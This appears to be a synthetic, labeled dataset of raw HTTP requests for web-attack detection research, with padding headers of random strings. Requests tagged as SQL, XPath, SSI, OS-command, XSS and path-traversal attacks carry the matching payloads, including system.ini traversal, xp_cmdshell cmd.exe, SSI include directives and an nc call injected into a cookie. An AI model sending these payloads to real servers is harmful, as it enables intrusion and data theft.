User-Agent: Mozilla/6.3 (Machintosh; U; Mac OS X 3.6; oc-on; rv:8.1.2) Gecko/88014782
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 128x875
Via: 4.7 www.ae1s.html:69328
Transfer-Encoding: deflate
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 763 5.20.25.117 "gmfte7ocbcLWwo" "Thu, 12 Jan 06 05:54:45 UTC"
X-Forwarded-For: 93.102.101.223
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41702
Start - Id: 48954
class: XPathInjection
GET /s9Rst7gaxg/6HFoCOZSTGp/amets3epeyntBio2anr.nsf?tseeSane=ltaaaj1Peeeh72tof&union-UugNmeIfhW=ob&taOlamelthgae=tko1&mntNeshiotr=hO4e8%27+++or++abdstU%2Fssyi7%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D787%5D+++or+++++%27stat%27++%3D++++%27&ozqpPZnullstylec=hqcei85tot8s0nr&0ayi0e9aknelg1=w&ie6wt2waua8o=50450897&ee865ei=2937&itq=EssEroo0aA&ms2uoSx6bcauwx=%405lBs&es=757&lHeyn9Nleye=sercat&HoGame=PoyFxdid4jQbEnyt HTTP/1.1
Host: 196.136.110.108
Connection: 9rred
Accept: application/x-tar;q=0.1, image/*;q=0.4, text/html;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: sgsh9aiE-Po;q=0.1, yiw-ggEtnuh;q=0.3, taeis-Le03dun, bz3-n;q=0.8
Cache-Control: max-age=22
Client-ip: 178.19.241.192
Cookie: wtEPyy=6413396;hQxUS9eOxg=iw9
Cookie2: $Version="71"
Date: Sat, 20 Dec 08 24:47:11 CET
ETag: "hlFeVvaXE-VssDg-Ivy"
Expect: 100-continue
From: ietdnl@1aln.fr
If-Modified-Since: Fri, 27 Apr 07 16:30:38 GMT
If-Unmodified-Since: Thu, 06 Aug 09 17:35:08 GMT
If-Match: *
If-None-Match: "2VzXCwtDhMwVchTT4O"
If-Range: Sat, 03 Jul 04 20:09:58 GMT
Max-Forwards: 68
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: 7ryrer l7Fsei=9ums
Authorization: vtaa iiuEo=syio
Range: 5-
Referer: /0eoo.jpg
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: iinaP/7.6.1.6
UA-CPU: Sparc
UA-Disp: 3657,5420,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 2276x9830
Via: ucrr/4.9 101.74.86.235, lyboeh/8.3 191.98.21.84, 9.1 www.oo2S.gif
Transfer-Encoding: compress
Upgrade: 6kse/1.8, ssz/9.9, tathn/5.4
Warning: 219 www.NUeeo.shtml "r8tNtaTA" 
X-Forwarded-For: 238.131.71.180
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48954
Start - Id: 46011
class: PathTransversal
PUT /y8bPQ@enqj9X@z/twohnooeh0s6cn/eOqRfqwWmsyeFIXl0Wt2/rboiaeNFtos/cb@F/refGtcxios/nuseloeeintRa/nN/ffyiriosjOiahogrx/aimupenln9zhzocolar/aaD/thZXIhkW2L-XLlLbdq.php4? HTTP/1.1
Content-Length: 74
Content-Language: kwuki
Content-Encoding: compress
Content-Location: http://pirttle.be/efehG/t8us.jsp
Content-MD5: bmlyQTBkamRlcnNvYmlpaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Nov 07 13:04:59 GMT
Last-Modified: Sat, 19 Apr 08 23:48:02 CET
Host: www.5rimo.de
Connection: ait4bSbe
Accept: */*
Accept-Charset: iso-8859-5, x-mac-chinesesimp;q=0.6
Accept-Encoding: identity;q=0.9
Accept-Language: a6y-ehdb;q=0.1, keatnsl-ignoeeEh;q=0.2
Cache-Control: fsotglA=riErard
Client-ip: 17.228.75.155
Cookie: m6yeipoi=eiafsgR3eraoforh;OuAei1=7aedAsRnAwHkn;eqAanSaesrw=m|also3k5tle;hteIs=..\..\..\..\..\..\..\..\..\WINNT\system.ini;h8erCrASco=ulikeincludeoelha>dhoro
Cookie2: $Version="4"
Date: Fri, 25 Dec 09 13:51:23 GMT
ETag: "eO1Ccbc.Nt5b9d2EP3tV"
Expect: nqzigr6
If-Modified-Since: Fri, 21 Mar 08 05:14:29 UTC
If-Unmodified-Since: Wed, 12 May 04 18:17:20 UTC
If-Match: *
If-None-Match: "3c6HTMR@lSXjJF5GABZ3"
If-Range: Fri, 18 Jun 04 24:44:59 UTC
Max-Forwards: 2
MIME-Version: 8.1
Proxy-Authorization: NTLM aWllclB0eGFxaWJjbnllbHR0ZTdlNjVkM2VlaTNzdHR1dHRp
Authorization: Digest nc=597e9F2B
Referer: /sERIh/4soad.png
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.2 (Windows; U; Windows NT 2.3; t5-oH; rv:9.8.4) Gecko/32180141
UA-Disp: 513,988,16
Via: HTTP/9.7 242.170.142.76, 5.3 www.nEeo8.js, 6.6 208.30.219.239
Transfer-Encoding: roxli; nnstieqx=iptbte
X-Forwarded-For: 150.199.183.225
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cTT_M92=r&5tmochaz= id&g-D9nxD@0=/ c0emitm&aaoo=2179015&qi9nr7=529148333

End - Id: 46011
Start - Id: 46588
class: XSS
GET /yr25lTWPDO_OR@wu/rebddf/UhfsshpFti/a1tdres8re/eHG9Ji/smioRotnP/sXsbWJAqvsBKbaL/wsioutslanOu/eB6xYDmJT@Ag/c6BHIY/3jKD_aDcoNAz-Gm1y.png?yrsuciumibE=h%3C&csie1cro9tfdmQe=sodSJoa.C_e&Ope@9BbvwhereK=hrC190Ud&Zxxrwm=Bteep4ar&Zv3LZyphLbm6=yns%40a%26edih2p&uHDUQFsuzOPN=rykqnxs&Hmsft=rPm&t7ii=likeahmg+obs1Ie&mochamwhereFddsD8bgsoundUwget=1lnx-U&hmeneElsnion=a5K651FvZU&ipz4ron6y6o5tbe=tuonrojhe&6eii=bpNXj6P HTTP/1.0
Host: www.jmantang.st
Connection: abffadD
Accept: */*
Accept-Charset: cp-950;q=0.6
Accept-Encoding: 
Accept-Language: javascript: alert    (     "   i.ntnho")
Cache-Control: min-fresh=452
Client-ip: 222.227.138.4
Cookie: e5mmoisuo=83
Cookie2: $Version="4"
Date: Sat, 24 Jun 06 01:24:20 GMT
ETag: W/"i_iTdQu4_UB@-BG"
Expect: dlAfce=f4aw
From: t0epeeaC@htiute.ch
If-Modified-Since: Sun, 16 Apr 06 21:07:55 UTC
If-Unmodified-Since: Wed, 26 Sep 07 06:54:20 UTC
If-Match: "Rsx0uDBbGRsxCdELJF"
If-None-Match: "tz2B.2h-l.9Ly-RL62"
If-Range: Fri, 05 Aug 05 14:31:55 UTC
Max-Forwards: 37
MIME-Version: 0.0
Pragma: 0=lcrb
Proxy-Authorization: so7n seEgteed=c5edme
Authorization: Basic b2Vhb2w6VGRlc2FxMWk=
Range: -65951,35-456894
Referer: /nceed7/aeitnre.jpeg
TE: trailers,chunked
Trailer: Referer
User-Agent: Mozilla/6.7 (Machintosh; U; Mac OS X 7.7; d8-hT; rv:5.8.7) Gecko/84271747
UA-CPU: PowerPC
UA-Disp: 3779,9058,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 991x9240
Via: 5.5 www.erwyaae.jpeg, 3.9 www.seNutos.htm, FTP/1.2 31.154.255.185
Transfer-Encoding: gzip
Upgrade: Sclxk9/4.9, M9s8r/4.0, 1pr/8.7, eh6/3.6, stmem/0.6
Warning: 051 74.151.102.193 "tps9iyOEh" 
X-Forwarded-For: 55.134.78.120
X-Serial-Number: 015353495234
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 46588
Start - Id: 42967
class: OsCommanding
GET /oeOwtVMMv.msf?Ra_P=4&feoEohxr=4850194755&gscriptUe=eobotemssinu1i HTTP/1.1
Host: www.owe7njwwna.ch
Connection: close
Accept: */*
Accept-Charset: windows-1250, x-mac-roman;q=0.6, windows-1255;q=0.8
Accept-Encoding: *
Accept-Language: ap-craothOr;q=0.4, Latelif-28hg;q=0.8, lm-HabhiEh, dnqw7att-aJ;q=0.5
Cache-Control: min-fresh=2
Client-ip: 115.213.51.204
Cookie: r4tjd=%0a   nc     www.lenderli.com 80    ;
Cookie2: $Version="0"
Date: Fri, 31 Jul 09 12:34:23 CET
ETag: "BY_3eSTW3yc4dwD-"
Expect: 100-continue
From: aaoq@n8t5el2e.org
If-Modified-Since: Thu, 09 Jul 09 18:56:34 CET
If-Unmodified-Since: Mon, 07 May 07 01:13:00 CET
If-Match: "1IHT1N9bRUeKEUH-_"
If-None-Match: *
If-Range: Thu, 13 Nov 08 16:05:00 UTC
Max-Forwards: 72
MIME-Version: 5.1
Pragma: EtD6ht=munah9
Proxy-Authorization: Basic aWl3dDp5aWNidHQ=
Authorization: NTLM VXJvZE5hbmJzbHNhQTRzbnBlb3JhdG1yZXJ2d2VyZTloaGlhZWxDeWg=
Range: 015-2505
Referer: /n0Nscath/eEhal/HuIcKcd9.png
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: aG3-402H http://www.hoehyi.uk
UA-CPU: StrongARM
UA-Disp: 702,4199,8
UA-OS: WinNT
UA-Color: color16
Via: 1.2 219.244.200.173
Transfer-Encoding: gzip
Upgrade: sge/3.1, e7lsIe/0.9, sre/2.7
Warning: 430 www.ooy4teh.gif "nn6ltSh" "Wed, 15 Nov 06 17:03:14 GMT"
X-Forwarded-For: 145.166.242.21
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42967
Start - Id: 44945
class: PathTransversal
GET /t9DaELnu3PVnullE/ghotede/xQiuL2dJXKThVUXkS/tDlXpR/ETx2GinGFFmVUD./twla11LePiIUao/ohmeutIJeeainp/oie2eyctstb8cero/aina/1rpZkd3QcVQQkGE.mspx?vip1mnxhde=Hstj&5l3LT8=2I80pXsU7sQ%40&JiKdivpV@=643&a6Sbaniws=optDealnbEetn0&giigkt4Gora=..%2F..%2F..%2Farront%2Fadmin.txt&zMIl=966&sh3=q6fisapynteD&sbixmhanu4jwoRl=+%27E%24funion%5Bmenctprocessing-instructionstyleo+&8teeaphcNpm=9376&ydefcfsgq=6999286&ohdt2ea=tlink%7C&eipast3dhqdk=48582508&Io3n0desrr6pd=984519&Mj.httpC=gEh1l2jwe&ylDmochaAan_K_=sercximg3s HTTP/1.0
Host: 98.243.200.197:1
Connection: close
Accept: image/png;q=0.0, video/mpeg
Accept-Charset: hz-gb-2312, windows-1250;q=0.7, x-mac-roman
Accept-Encoding: compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 199.211.182.175
Cookie: fotThYlbs=o9otySnW;sexrBwjtOciN=childitdyF;inhxmara=Tota;e4ElpaRn=90492
Cookie2: $Version="755"
Date: Thu, 31 May 07 07:47:45 CET
ETag: "JXNNDx3uyToj_uODPw"
Expect: 100-continue
From: idto@ug5qpuenx6.org
If-Modified-Since: Sat, 19 Jan 08 16:02:52 UTC
If-Unmodified-Since: Tue, 15 May 07 22:12:25 GMT
If-Match: *
If-None-Match: "1z7E2N9Lg@uLveYI"
If-Range: *
Max-Forwards: 5
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest response="cFbf2F57cDDF4E7Ed19bE92BCEa0ec12"
Authorization: Digest nonce
Range: 032407-30
Referer: /jf0ehpt/8aowdi.doc
TE: deflate
Trailer: Referer
User-Agent: Mozilla/5.5 (Windows; U; Win 9x 9.8; 7E-ee; rv:0.5.2) Gecko/69210341
UA-CPU: StrongARM
UA-Disp: 8355,9239,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 2762x370
Via: HTTP/3.9 5.50.89.38
Transfer-Encoding: compress
Upgrade: sSAynh/2.0, tnEo/3.3, jo1wa/2.9
Warning: 151 7.22.89.225 "tqonsaseaLehs" "Fri, 02 Feb 07 23:07:17 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44945
Start - Id: 40678
class: SSI
GET /snrdHp.exe?NSUE=slt&9aho7ohpvP=t%7C%3Eq4&iwPoi=script&shruz=57356&ojmi=%3C%21--++%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++--%3E HTTP/1.1
Host: www.dE9m.de:0379
Connection: hortetlh
Accept: text/plain;q=0.6
Accept-Charset: x-mac-korean;q=0.1
Accept-Encoding: gzip;q=0.3, deflate, deflate, compress
Accept-Language: Artl-r, t4sa-a4dnda;q=0.5
Cache-Control: no-transform
Client-ip: 139.153.6.255
Cookie: xrzsneOktnshtws=414;mehsgarXwiEely=9i;pynombol=lNstbars4fmhrera;tqteqef7ewg2zn=eJnointoeEiiheoets;1hclrqr=e.iCg0iie
Date: Fri, 03 Oct 08 18:58:10 UTC
ETag: W/"nQowONbBuqGBRqoN"
Expect: a7cn
From: kyipfoyn@ugT7me.be
If-Modified-Since: Sun, 07 Jun 09 13:58:06 UTC
If-Unmodified-Since: Mon, 10 Sep 07 04:09:34 CET
If-Match: "99O..PUVgPiAO.3-gk4"
If-None-Match: *
If-Range: Sat, 17 Sep 05 10:18:40 CET
Max-Forwards: 9
Pragma: ooa='sRn'
Proxy-Authorization: Digest realm
Authorization: NTLM dG91cm85YW9hZ2lldW9tbDZnZWl0NTk0aGZ2bWViOTVsdGVZNTY3enJydm4xZWVy
Range: -41940,-0
Referer: http://www.oAre2nu.it/ilsoile/scd04toH/eqcekcEi.pdf
TE: trailers,chunked;q=0.1
User-Agent: Mozilla/0.9 (Machintosh; U; PPC 7.2; ta-tr; rv:9.9.3) Gecko/60207351
UA-CPU: StrongARM
UA-Disp: 854,3532,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 106x2848
Via: 5.6 www.i7bcEo.png:2, ieno/6.2 www.tqvenf.css:28216, 9.9 www.naeq.shtml
Transfer-Encoding: gzip
Upgrade: ccosl/3.4, orc/9.2
X-Forwarded-For: 236.213.169.46
X-Serial-Number: 017478485639
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40678
Start - Id: 39457
class: SSI
GET /l0rl7islEtc1fu5aaBwe/eros86ejtnghrtsrAhh/wmtk-/z9Wx/rvLz/yVaWvfk7fIf7T/enzema9oed6otr/iHKLqT/i_sekm-Kz3fqlv.Rw/3ECRrtap1n/hdtrxeL4WssdbuoSt/o9hsT5wwvIScDm4.asmx?He=%3C%21--%23email+fromhost%3D%22www.eTirre.com%22+tohost%3D%22mailbox.odce.com%22+message%3D%22QtEdn6+xmrdieb+cz4rana+1dpsi%22+fromaddress%3D%22eouudn.com%22+toaddress%3D%224kt.1aht.com%22+subject%3D%223o%22+sender%3D%22I3va.com%22+replyto%3D%22da6sj0h.com%22+cc%3D%22wew%22+inreplyto%3D%22tee+jnpm+3a%22+id%3D%22nhimail%22+--%3E&ibhidoheusle=iYy4wL5b2ykh&reraxtHmtpea=3&IygAlotge=738&tOoerapubad=eegl%3Fevalop4meno&iehiscw=e%40srYa&t2=16802482&ah=n6s&eeahc=isils HTTP/1.1
Host: www.boag.be:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=091
Client-ip: 93.255.83.3
Cookie: ssYsnhi4cnL4p7T=aUciboA8Iem0lsn0e;Haj=e:r ;TXAbV=3854;4ito6Rle=r-a_
Date: Sun, 18 Nov 07 19:01:31 UTC
If-Modified-Since: Sat, 17 Jun 06 02:36:29 CET
If-Match: "RQ-@Nuph6_o6whkOFda"
If-Range: Sat, 09 Apr 05 10:57:16 CET
MIME-Version: 7.4
Pragma: dcsce='7aa'
Authorization: Digest qop=auth-int
Referer: /9lesrxc/iye0r/lasot/nltsees.conf
TE: chunked;q=0.7,trailers,trailers
Trailer: Referer
User-Agent: dsGs4 (5IdBON.L1G)
UA-Disp: 725,135,16
UA-OS: Linux
Via: 2.4 www.ona71k.png, onTA/7.2 www.tisiaasq.gif
Transfer-Encoding: deflate
Warning: 728 www.fadyet.png "wm9iowri" "Sun, 18 Sep 05 04:10:06 CET"
----: --------------------

null

End - Id: 39457
Start - Id: 44381
class: OsCommanding
GET /ssi/envout.bat?|dir%20..............1 HTTP/1.0
Host: 194.142.166.57
Connection: fRcltdm
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, compress;q=0.2, gzip
Accept-Language: iF-urnd;q=0.0, meO-hhvRmctG
Cache-Control: o='tihhuId'
Client-ip: 90.164.80.82
Cookie: n1rilgdleu9enf=aa;EunionS.4bZkRg8=f unionOa6 pAstnen;dAtjo=t3NCJ.bp;rteimw=rar;lgTciliye=0335;botooedsr=a
Cookie2: $Version="962"
Date: Tue, 31 Jul 07 08:47:53 CET
ETag: W/"e9iUBvPePkscvJ4"
Expect: 100-continue
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Mon, 23 Jun 08 11:44:47 UTC
If-Unmodified-Since: Mon, 03 Nov 08 02:01:35 GMT
If-Match: "T4zlc4FMAAGr3y8"
If-None-Match: "dcNs23J-dHPSJRW9"
If-Range: Thu, 11 Oct 07 11:16:51 UTC
Max-Forwards: 2
MIME-Version: 1.4
Pragma: eaeS26x=ia3iqche
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: Basic YlJoZWlnOjN6aW5lR2I=
Range: -592489
Referer: /uat6etrA/2Tzve/eeteorot.exe
TE: trailers,chunked;q=0.5
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.7 (Machintosh; U; PPC 4.5; rq-as; rv:3.6.8) Gecko/29138169
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 347x4806
Via: FTP/7.8 221.252.209.249, 1.7 www.ien9hpl.html:6316, 0.0 236.202.122.185:03
Transfer-Encoding: deflate
Upgrade: HeiarI/6.4, enio/6.7, DHqogf/0.4
Warning: 551 92.44.38.235:34239 "tifgnertsiaoesxw" 
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 16212196997401300
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44381
Start - Id: 39455
class: SSI
GET /tc2GUvp5Pq.B@/oiuvieoetvQ/x7KksPoRqlJSOM6I.mspx?Nahih=%3C%21--%23email+fromhost%3D%22www.des5szaE.com%22+tohost%3D%22mailbox.a31.com%22+message%3D%22ntgTva+kinombe+7aTliF+haUn9t%22+fromaddress%3D%22Ueor.com%22+toaddress%3D%22osi.etRt.com%22+subject%3D%22o%22+sender%3D%22in.com%22+replyto%3D%22hratnE.com%22+cc%3D%22a8ue%22+inreplyto%3D%22eesDn+pto+ll%22+id%3D%22thlnmail%22+--%3E HTTP/1.1
Host: www.e4k8eraun.com
Connection: close
Accept: audio/*, video/*, video/*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Date: Mon, 01 Oct 07 10:33:59 UTC
MIME-Version: 7.4
Pragma: no-cache
Referer: http://www.Tethsnn.de/I4estt/peTL/wnr5eoht.php4
User-Agent: Mozilla/4.0 (compatible; MSIE 8.3; Win 9x; lAlwjey; oktrtc)
Transfer-Encoding: deflate

null

End - Id: 39455
Start - Id: 36424
class: OsCommanding
GET /i82Cat.aW3IcRkXN@J0/pB8LExrYb-TodqouK5/lOwOguxHc5jcBtt_/wF_7s/d1k5nrntnRtvtsNua/OhjroIei/eia4dtoG75FhakiS/K3yiodgeotu.mdb?4update.QlYBoA=%27%3BEXECmaster.dbo.xp_cmdshell%27cmd.exe&8iootili=b&siantYeDhyhai=poet2osehpovho&pwxw=nQr&i0an1x=rcepOl HTTP/1.0
Host: 113.161.245.187
Connection: nqed
Accept: */*;q=0.4
Accept-Charset: x-mac-icelandic, macintosh;q=0.1, windows-1255, utf-7;q=0.0, windows-1253
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Cookie2: $Version="989"
Date: Thu, 06 Jul 06 11:26:30 UTC
Expect: 100-continue
If-Modified-Since: Sat, 18 Sep 04 17:24:55 GMT
If-Unmodified-Since: Thu, 30 Jul 09 18:38:21 CET
If-Match: "K4UEzR9v@cC5dIeoKx1T"
If-None-Match: *
If-Range: Sun, 20 Jul 08 11:41:49 GMT
Max-Forwards: 2530
Pragma: no-cache
Proxy-Authorization: nepNn i3ojyhoe=ie8iLk
Range: 414892-,92535-284,6-8
Referer: /nteishe/yoahsty.ace
Trailer: TE
User-Agent: Mozilla/5.2 (Machintosh; U; PPC 0.2; eF-nn; rv:5.6.6) Gecko/57168526
Via: 9.7 www.nechs4.jpeg:30329, wr2q/3.2 www.tTlzifn.htm
Warning: 525 www.0kts.png "xclnrsutiletd3rtSdir" "Tue, 27 Dec 05 20:35:02 GMT"
----: -------------------------------------------------

null

End - Id: 36424
Start - Id: 48431
class: XPathInjection
GET /3gp.cfm?sZc=Phtpass%3Ce&nlEulsakdtNhbn=tZ_wOxn5W%40v&ttDopgA=R+h&ioahghtblh7dew=+ifautoexec&vaetn4ia=j98j_c5&9eolS=madln&nelhedoiclnee=ehevtanos&ncomeyrv0atR1r0=%5Cg&1wot=nlexecea1mi&hbtog=iixp_oobjectiibee%27ce&shutdownenlH10LcEgG=ttEftftazma&oitpensRki=ns&p7raem6=9300&5E3rgak6irne=hcyU_EtQc&CT.whereW=sivoRmoe6 HTTP/1.1
Host: 119.121.229.181
Connection: close
Accept: image/gif, image/png
Accept-Charset: *;q=0.8
Accept-Encoding: compress
Accept-Language: tm-y
Cache-Control: iaemherj=8et
Client-ip: 161.32.126.160
Cookie: 3ciewngecjds=nlstsom7gnhm;WxBX5Q-=o8e'     or path/child::node()[position()=N]   or     'Aelbfu'  =  ';aeu=aiarAdn;nht=Sjvt;hoohqyhchir=2893
Cookie2: $Version="35"
Date: Tue, 19 Sep 06 12:37:36 UTC
ETag: "OSHMD_QXsJIxSI9F_k"
Expect: 100-continue
From: Jhte@ioNeu6fte.fr
If-Modified-Since: Tue, 18 Mar 08 11:26:51 GMT
If-Unmodified-Since: Tue, 18 Oct 05 01:18:30 GMT
If-Match: *
If-None-Match: "1OC_aW9vvRO1_0nND"
If-Range: "wxbkgEhSJh17u9Yd5wh"
Max-Forwards: 28
MIME-Version: 3.7
Pragma: mw=DDmle0
Proxy-Authorization: Basic aHdldXU6aDdkZXJt
Authorization: NTLM czN3ZG9HdHQzdGg4Q2wzd2hkc3RIb2VydDZkbmFrc2hjaWVsaE1keHB3c2VvU3lu
Range: -39,1-
Referer: /aiwt/1eoaeseH/heafpoe/orEuij7f/lrhur.jpeg
TE: gzip,trailers
Trailer: If-Match
User-Agent: Mozilla/0.6 (compatible; MSIE 8.1; WinNT; xgrMqm)
UA-CPU: MIPS
UA-Disp: 711,039,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 784x619
Via: 4.0 178.66.197.106, 7.9 120.195.140.147
Transfer-Encoding: compress
Upgrade: 7eaeH/4.4
Warning: 484 www.gtio.jpg "pu9t4b7o63nafyaem" 
X-Forwarded-For: 110.20.49.195
X-Serial-Number: 72505509586520475134
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48431
Start - Id: 42128
class: SqlInjection
GET /x1bRNAJOqS1SB.mdb?yLLKw2l_yJ=%27%29++UNION+ALL+SELECT+41591+++FROM++dAMelrG+++WHERE+%28+%27%27++++%3D++++%27&56faa=l%28a&m2fuespthe=982&5it=2040752&Sxtusrtiud8ne1=itubttulei6r&ertj0bissose=access_log+&eeesegsehndrc=8206615557&fn=ltdrcp%3Bbki%7Esrx8pn&s9e=skesggaiaouNs4&yo2rhe=ie&8utiArh9=56&ctnzgeft=00 HTTP/1.1
Host: 83.83.141.209
Connection: eninonm
Accept: */*;q=0.0
Accept-Charset: x-mac-chinesetrad;q=0.2
Accept-Encoding: identity, compress, gzip, deflate;q=0.1, deflate
Accept-Language: eerw2mpe-eeQ;q=0.1, iou-oeOai9, SxtiysQd-danrmj, mSsrx-meif
Cache-Control: no-transform
Client-ip: 17.1.72.59
Cookie: tnrt4yDh=2322283835;YmQ77netcathtpass=lNtetiadmql;mA4frqinelLtb=87;7tphod7yuc=iZTH9j7V;efaesfd=nm&tncopen4emwtl]aechoe?i
Cookie2: $Version="994"
Date: Sat, 04 Sep 04 16:03:24 CET
ETag: "36ABV77V@jd_sdUj"
Expect: ahiWkN=nO6ei
From: islI@rcdrtQr.org
If-Modified-Since: Wed, 26 Mar 08 20:31:22 UTC
If-Unmodified-Since: Tue, 19 Jun 07 20:21:13 GMT
If-Match: "BXotdG2wQvQZWvxAu"
If-None-Match: *
If-Range: "-t@QcvOSPbfghpj2hrd."
Max-Forwards: 0
MIME-Version: 7.0
Pragma: Ns=vn8eitr
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic bjh0MHZkNzpzT1Vu
Range: 80-3804,023297-91,09-
Referer: http://www.icsnt.de/spgal/ebtTvHts/braHl5o9.htm
TE: deflate;q=0.7
Trailer: Range
User-Agent: Mozilla/4.6 (X11; U; Open BSD i386 3.1; mt-lt; rv:9.5.6) Gecko/27072700
UA-CPU: MIPS
UA-Disp: 3899,512,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1285x9347
Via: HTTP/0.1 www.xang.gif, iay/2.4 160.19.139.125:6
Transfer-Encoding: deflate
Upgrade: teh/9.0, ittnn/5.6, ohtcp/8.9
Warning: 210 www.mTetdThm.shtml "LTt1suesam" "Fri, 22 Feb 08 23:40:02 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 45705
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42128
Start - Id: 48506
class: XPathInjection
POST /sW48Z_openM2KpassthruvarY/hGyetifeeonq/eapatofnesve.jpeg? HTTP/1.0
Content-Length: 221
Content-Language: i,soe,r
Content-Encoding: compress
Content-Location: http://www.Hrttee.fr/iitp/Rr4rn0rr/hniepmxn.php
Content-MD5: aHU0c3I4ZW5zb2Fhbnk4ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Nov 09 03:20:28 CET
Last-Modified: Sat, 23 Jun 07 05:26:00 UTC
Host: 98.90.27.54
Connection: keep-alive
Accept: image/gif, text/*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 117.212.24.161
Cookie: uytsnaeasiulot=nane9ripm0o
Cookie2: $Version="8"
Date: Tue, 23 Nov 04 01:34:57 UTC
ETag: W/"Z8k6MID8rdOhM91kgfF"
Expect: tie2eoae=a2Lip;ohiRi=5ei7M
From: jkr2eEN@ynbikoR.uk
If-Modified-Since: Tue, 21 Oct 08 18:57:20 CET
If-Unmodified-Since: Fri, 23 Sep 05 20:28:04 UTC
If-Match: *
If-None-Match: ".bYgv1BA4ZQP4n5M"
If-Range: Mon, 12 Jul 04 10:54:36 CET
Max-Forwards: 65
MIME-Version: 4.9
Pragma: no-cache
Authorization: NTLM ZW5hZmVlbm9yYU9mbXNuZ256M1llZTRvSml6dG9GcjZpcHh0c2VDb3l0bg==
Referer: /p6t9tfg6/exna/bauat0e/feian/0tinenr.dll
TE: chunked,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/3.8 (Machintosh; U; PPC 4.8; tt-dm; rv:9.6.1) Gecko/59623619
Via: FTP/5.9 2.174.8.152, 3eaoo/2.4 23.210.233.175
Transfer-Encoding: gzip
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 01871
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

eprrtpiujeueeru=c5pRNioe&tihfWteii=981&jAih2enaot=Oou/r/5utsys/child::node()[ position()=34]     |     v/rgqtet/nMS/child::text()[position()=9]  or  'bt5sagv' =  '

End - Id: 48506
Start - Id: 39294
class: SSI
GET /bFFRrnDP/9GOIjBOEmK1e.html?eacurelnnhO=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&praentil5te=ojl&o2xrot3e1q=87960670&dq=gaonee5apohdod&ylc6cegGui=abdOa8lmttriehevco&gtEnTsftwm=wmtthve&shsh1n=ceoketgidliframe%24e%7C+&hltosarryedrx=mxi2oWJ_PD&Os7HPjrveiu=eupf HTTP/1.0
Host: 173.151.87.34:506
Connection: keep-alive
Accept: text/*, image/*;q=0.8, video/quicktime
Accept-Charset: *;q=0.8
Accept-Encoding: deflate, compress;q=0.4, gzip;q=0.7, identity
Accept-Language: nth5Tr-woxm4t;q=0.5, cl-ysst
Cache-Control: a=gl70sb
Client-ip: 178.60.27.113
Cookie: emlinsaeodats=829177;adminDkC=tbCGL31Y6KEz
Cookie2: $Version="390"
Date: Wed, 18 Feb 09 18:02:44 CET
ETag: W/"jsr.W0L@rVg50t8d"
Expect: 100-continue
From: unmiie@Hyivtsn.com
If-Modified-Since: Thu, 31 Jan 08 11:47:45 GMT
If-Unmodified-Since: Sun, 29 Mar 09 17:57:44 GMT
If-Match: *
If-None-Match: "Ohb_@MSYNk.0vicdi"
If-Range: Thu, 16 Dec 04 20:00:28 CET
Max-Forwards: 6
MIME-Version: 6.8
Pragma: ieyern=w
Proxy-Authorization: Basic N3NzZ21vbG86bnUzaQ==
